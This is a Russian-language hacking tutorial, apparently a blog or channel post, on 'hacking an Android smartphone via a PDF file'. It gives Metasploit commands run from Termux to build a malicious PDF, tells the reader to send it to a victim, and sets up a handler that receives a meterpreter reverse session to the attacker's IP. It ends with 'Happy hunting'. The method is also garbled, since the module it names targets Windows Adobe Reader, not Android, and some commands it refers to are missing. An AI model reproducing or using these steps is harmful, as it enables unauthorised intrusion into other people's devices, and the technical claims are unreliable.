June 30, 2024
Как взломать Android смартфон через .PDF файл
Простейшая атака, которую ты сможешь повторить даже не имея компьютера.
Всем салют, дорогие друзья,
эта статья посвящена взлому Android смартфона с помощью PDF-файла.
Для проведения данной атаки можно использовать не только компьютер с установленным Linux, но и свой Android смартфон (вам понадобится установить Termux).
Сейчас расскажем все подробнее...
Вам понадобится:
- Приложение Termux (загрузите его из Play Store или F-Droid).
- Установить Metasploit Framework в Termux.
- Termux должен иметь возможность использовать внешнее хранилище (для этого введите команду:
termux-setup-storage). - (Рекомендуется, но не обязательно) Установите клавиатуру Hacker's Keyboard для легкого ввода команд в Termux.
После того, как вcе описанное выше - выполнено, можно приступать к взлому.
Запуск консоли Metasploit
- Откройте Termux, если используете свой смартфон, или терминал, если используется компьютер с Linux.
- Введите следующую команду, чтобы открыть консоль Metasploit
Создание PDF-файла (Полезная нагрузка)
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
Затем вы должны настроить Localhost. Для этого вам понадобится ваш IP-адрес, чтобы проверить его тип, вводите в новом окне session на termux или в другом окне терминала:
Замените IP-адрес, указанный в приведенной выше команде, вашим собственным IP-адресом
Вы можете использовать любой порт, например 4564, 8080 и т.д.
exploit
- Теперь в течение секунды появится сообщение о том, что ваш PDF-файл создан.
- Остается отправить этот файл своей жертве. Как только она его откроет, вы получите сеанс metasploit.
Использование
use exploit/multi/handler/ set LHOST <your_IP> set LPORT 4444 exploit
Убедитесь, что вы ввели тот же IP-адрес и порт, что и выше, во 2-м шаге.
- Пройдет немного времени, после чего вы получите сеанс meterpreter.
- Поздравляю! Вы получили доступ к смартфону жертвы и можете делать с ним все, что душе угодно.
На сегодня это все. Удачной охоты!
Больше сливов тут👉𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚